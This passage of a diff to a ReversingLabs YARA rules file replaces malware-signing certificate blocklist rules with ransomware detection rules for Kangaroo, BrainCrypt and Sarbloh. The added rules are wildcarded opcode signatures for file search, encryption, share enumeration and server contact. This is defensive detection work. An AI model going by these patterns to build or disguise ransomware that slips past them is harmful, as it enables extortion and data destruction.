+            ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 EA ?? 89
+            55 ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B
+            45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
+            ?? C1 E0 ?? 03 45 ?? B9 ?? ?? ?? ?? 6B D1 ?? 89 44 15 ?? B8 ?? ?? ?? ?? C1 E0 ?? 8B
+            4D ?? 89 4C 05 ?? BA ?? ?? ?? ?? D1 E2 8B 45 ?? 89 44 15 ?? 8D 4D ?? 51 E8 ?? ?? ??
+            ?? 83 C4 ?? E9 ?? ?? ?? ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? EB ?? 81 7D ?? ?? ?? ??
+            ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? B8 ?? ?? ?? ?? EB ?? 33 C0
+        }
+		$find_files = {
+            8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 33 D2 8B 45 ?? 66 89 10
+            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 83 F8 ?? 75 ?? E9 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 44 02 ?? 3D ?? ?? ?? ??
+            72 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B
+            48 ?? 81 79 ?? ?? ?? ?? ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 8B 95 ?? ?? ?? ?? 83
+            E2 ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B 0D ?? ?? ?? ?? 51
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D
+            ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E2 ?? 8B 45 ?? 89 44 15 ?? 8D 4D
+            ?? 51 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 75 ?? 6A ?? A1
+        }
+		$encrypt_files = {
+            8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ??
+            E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 4D ?? 2B C8 8B
+            45 ?? 1B C2 89 4D ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 50
+            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ??
+            81 7D ?? ?? ?? ?? ?? 73 ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 FF
+            15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            EB ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89
+            45
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, zhenganjun" and pe.signatures [ i ] . serial == "57:d7:15:3a:89:bb:f4:72:9b:e8:7f:3c:92:70:43:aa" and 1469059200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $enum_shares_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_028E1Deccf93D38Ecf396118Dfe908B4 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Kangaroo : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Kangaroo ransomware."
 		author = "ReversingLabs"
-		id = "6dfb0181-299f-5a28-b647-137d75f747a6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "ec4342c1-adc9-5ddb-b403-83c2b1ce5899"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L225-L241"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Kangaroo.yara#L1-L91"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b07c797652ef19c7e0b23c3eddbbbf2700160d743d71a0005b950160474638d8"
+		logic_hash = "1078fb3d47ad737548419e5ee66e686f705c02fea27a58c0097446547325772c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Kangaroo"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            83 EC ?? 53 55 8B 6C 24 ?? 56 57 33 FF 57 57 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 33 DB 55
+            89 5C 24 ?? 89 7C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ??
+            ?? 8D 44 24 ?? 50 8D 4C 24 ?? 51 8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 57 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
+            8B 54 24 ?? 8D 4C 24 ?? 51 57 57 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85
+            ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 50 8B 44 24 ?? 68 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? 8D 4C 24 ??
+            51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57 56 FF
+            15 ?? ?? ?? ?? 8B 54 24 ?? 57 8D 4C 24 ?? 51 57 57 6A ?? 57 52 89 44 24 ?? FF 15 ??
+            ?? ?? ?? 8B 44 24 ?? 6A ?? 68 ?? ?? ?? ?? 50 57 8B 3D ?? ?? ?? ?? FF D7 8B 54 24
+        }
+		$encrypt_files_p2 = {
+            6A ?? 8D 4C 24 ?? 51 52 8B D8 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B
+            44 24 ?? 8B 54 24 ?? 50 8D 4C 24 ?? 51 53 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 83
+            F8 ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
+            8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 54 24
+            ?? 52 8D 44 24 ?? 50 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 55 8B F8 68 ?? ?? ?? ?? 57
+            FF 15 ?? ?? ?? ?? 83 C4 ?? 57 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ??
+            ?? ?? ?? 8B C5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15
+            ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 33 FF 8B 44 24 ?? 50 FF 15
+            ?? ?? ?? ?? 89 7C 24 ?? 8B 4C 24 ?? 57 51 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 5F
+            5E 5D 8B C3 5B 83 C4 ?? C3
+        }
+		$find_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 57 56 FF 15 ?? ?? ?? ?? 8B 3D ??
+            ?? ?? ?? 33 C9 83 F8 ?? 0F 94 C1 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 4C 24
+            ?? FF D7 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 44 24
+            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90
+            8B 3D ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 8D 54 24 ?? 52 56 68 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 50 EB ?? 8D 4C 24 ?? 51 56 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 83
+            C4 ?? F6 44 24 ?? ?? 74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85
+            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D
+            94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 33 FF 33 F6 EB ?? 8D 9B
+            ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF D3 85 C0 74 ?? BF ?? ??
+            ?? ?? 83 C6 ?? 83 FE ?? 72 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D3 85 C0 75
+            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? BF ?? ?? ?? ?? 8B 44 24
+            ?? A8 ?? 75 ?? A9 ?? ?? ?? ?? 75 ?? 85 FF 75 ?? 3D ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ??
+            8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 8C
+            24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 FF 15 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D
+            C3
+        }
+		$enum_resources = {
+            55 8B EC 83 E4 ?? 83 EC ?? 8B 4D ?? 53 56 57 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5F 5E
+            5B 8B E5 5D C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 4C
+            24 ?? 8B C3 85 C9 74 ?? 8D 64 24 ?? C6 00 ?? 40 83 E9 ?? 75 ?? 8B 54 24 ?? 8D 44 24
+            ?? 50 53 8D 4C 24 ?? 51 52 E8 ?? ?? ?? ?? 85 C0 75 ?? 33 FF 39 7C 24 ?? 76 ?? 8D 73
+            ?? 8D 49 ?? 83 7E ?? ?? 75 ?? 8B 06 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4E ?? 83 E1 ?? 80
+            F9 ?? 75 ?? 8D 56 ?? 52 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72 ?? EB ?? 3D ?? ??
+            ?? ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ??
+            5B 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fortuna Games Co., Ltd." and pe.signatures [ i ] . serial == "02:8e:1d:ec:cf:93:d3:8e:cf:39:61:18:df:e9:08:b4" and 1392163199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_40575Df73Eaa1B6140C7Ef62C08Bf216 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Braincrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BrainCrypt ransomware."
 		author = "ReversingLabs"
-		id = "6a6e6320-8e01-5ec7-8119-3e90f1eacc4e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "190798d5-594d-5b80-aa0e-8d7ff167f1c0"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L243-L259"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BrainCrypt.yara#L1-L121"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7da8e98f38413e5cbb18e3c7771c530afb766dd9fbeb8fdd2264617aff24f920"
+		logic_hash = "85866d6ffa136bf3ed27bbab55ae5430af4a1363930ebacab0df9ad24f8734cb"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BrainCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$get_files_for_encryption_32 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 80 7C 24
+            ?? ?? 74 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? C3 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ??
+            83 C3 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ??
+            ?? 8B 1D ?? ?? ?? ?? 83 C3 ?? 8D 7C 24 ?? FC 8B 0B 89 0F 8B 4B ?? 89 4F ?? E8 ?? ??
+            ?? ?? 8B 5C 24 ?? 89 1D ?? ?? ?? ?? 8B 5C 24 ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 89 1D ??
+            ?? ?? ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? E8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0C 24 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 4C 24 ?? 89
+            4C 24 ?? 89 44 24 ?? 89 44 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? BD ?? ?? ?? ?? 89 2C 24 89 5C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9
+        }
+		$encrypt_file_32 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 5C 24
+            ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 8B 44 24
+            ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 5C 24 ??
+            89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24
+            ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 54 24 ??
+            89 54 24 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? C3 E8 ?? ?? ?? ?? E9
+        }
+		$attach_to_server_32 = {
+            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 31 DB 89
+            5C 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 89 CF 83 F9 ??
+            0F 84 ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 83 3C 24 ?? 0F 84 ?? ??
+            ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89
+            1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ??
+            89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ??
+            0F 84 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B
+            44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 31 DB 89 5C 24 ?? 89 5C 24 ?? 31 ED 39 E8 0F 85
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 89 44 24 ?? 89 44 24
+            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 68
+            ?? 89 6C 24 ?? 89 6C 24 ?? 89 4C 24 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 59 ?? C7 04 24
+            ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? 8B 44 24 ?? 83 F8 ?? 74 ?? 83 C0 ?? 8D 7C 24 ?? FC 8B 08 89 0F 8B 48 ?? 89 4F ??
+            E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B
+            54 24 ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 54 24 ?? 89 54 24 ?? 89 4C
+            24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B
+            5C 24 ?? 89 5C 24 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3
+        }
+		$get_files_for_encryption_64 = {
+            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
+            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 0F B6 44 24 ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05
+            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ?? 0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40
+            ?? 48 89 0C 24 48 89 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ??
+            0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ??
+            ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0D ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 84 C9 0F 85
+            ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44
+            24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 04 24
+            48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 8D 05 ?? ??
+            ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B
+            4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 48
+            8D 0D ?? ?? ?? ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 0F 0B 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ??
+            ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? E9
+        }
+		$attach_to_server_64 = {
+            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
+            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 89
+            7C 24 ?? 84 07 0F 57 C0 48 83 C7 ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48
+            8B 6D ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48
+            89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D ?? ?? ?? ?? 48 89 4C
+            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D
+            ?? ?? ?? ?? 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ??
+            48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ??
+            ?? 48 8B 44 24 ?? 48 8B 48 ?? 48 8B 10 48 8B 58 ?? 48 8B 40 ?? 48 39 CB 0F 87 ?? ??
+            ?? ?? 48 29 D9 48 29 D8 48 85 C0 0F 84 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 01 DA
+            48 89 54 24 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C
+            24 ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B
+            48 ?? 48 8B 50 ?? 84 01 48 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 48 83 C1 ?? 48 89 4C 24
+            ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44
+            24 ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44
+            24 ?? 48 8B 4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B
+            4C 24 ?? 48 8B 54 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89
+            54 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 44 24 ?? 48 89 8C 24 ??
+            ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 48 8B 6C
+            24 ?? 48 83 C4 ?? C3 31 DB E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9
+        }
+		$encrypt_file_64 = {
+            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
+            EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89
+            44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 89 04 24 48
+            89 4C 24 ?? 48 89 54 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48
+            89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48
+            8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 89 1C 24 48 8B 5C 24 ?? 48 89 5C 24 ??
+            48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B 6C 24 ?? 48 83 C4 ?? C3 E8 ?? ?? ?? ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dali Feifang Tech Co.,LTD." and pe.signatures [ i ] . serial == "40:57:5d:f7:3e:aa:1b:61:40:c7:ef:62:c0:8b:f2:16" and 1394063999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $get_files_for_encryption_32 and $encrypt_file_32 and $attach_to_server_32 ) or ( $get_files_for_encryption_64 and $encrypt_file_64 and $attach_to_server_64 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_049Ce8C47F1F0E650Cb086F0Cfa7Ca53 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sarbloh : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sarbloh ransomware."
 		author = "ReversingLabs"
-		id = "aebba591-2024-584a-bba6-9a27049cf4b8"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "532abd77-f091-5c54-87a3-7e8be5253efd"
+		date = "2021-05-21"
+		modified = "2021-05-21"
 		reference = "ReversingLabs"
